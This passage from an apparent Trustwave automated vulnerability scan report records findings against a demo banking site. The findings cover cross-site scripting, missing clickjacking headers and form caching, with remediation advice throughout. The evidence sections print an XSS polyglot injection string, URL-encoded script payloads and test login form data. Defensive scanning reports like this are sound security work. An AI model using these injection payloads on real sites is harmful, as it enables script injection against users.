3Cscript%3Ealert%2815650642.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: https://65.61.137.117/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 500 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 501 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650656.00617)//>*/alert(15650656.00617)/*
Detection: An alert was detected containing 15650656.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 502 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 503 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=D5CC99799F62567D97687377E9E57D1E;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:05:09 GMT"]}
url: http://65.61.137.117:8080/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 504 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=7396ECE6F9230BEA6656EC9364C1EEE4;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:04:14 GMT"]}
url: http://demo.testfire.net:8080/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 505 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=6AD1B35870824ABE33FC4A206303ADA1;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:06:04 GMT"]}
url: https://demo.testfire.net:8443/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 506 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=5E429D789B42131617FC21FC2C7092B0;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:06:59 GMT"]}
url: https://65.61.137.117:8443/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 507 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=91AE2C06F7F66EB7AC4721CA7926E84A;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:03:20 GMT"]}
url: https://65.61.137.117/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 508 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=6FBDC1BA64262E169CD8AA130C5A6D25;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:00:33 GMT"]}
url: http://demo.testfire.net/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 509 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=43417874F1E2104EC67B2F9DEE17E8CE;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:01:27 GMT"]}
url: http://65.61.137.117/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 510 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=ECBF550A2EE43223488AC21A19DCD097;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:02:22 GMT"]}
url: https://demo.testfire.net/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 511 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 512 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net:8443/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 513 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 514 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net:8080/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 515 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 516 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
forms Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 517 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 518 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 519 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
http://demo.testfire.net:8080/index.jsp?content=business.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 520 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 521 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 522 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 523 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 524 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net:8080/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 525 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 526 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 527 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
https://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 528 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 529 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 530 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117:8443/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 531 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 532 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 533 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 534 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 535 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 536 of 1637
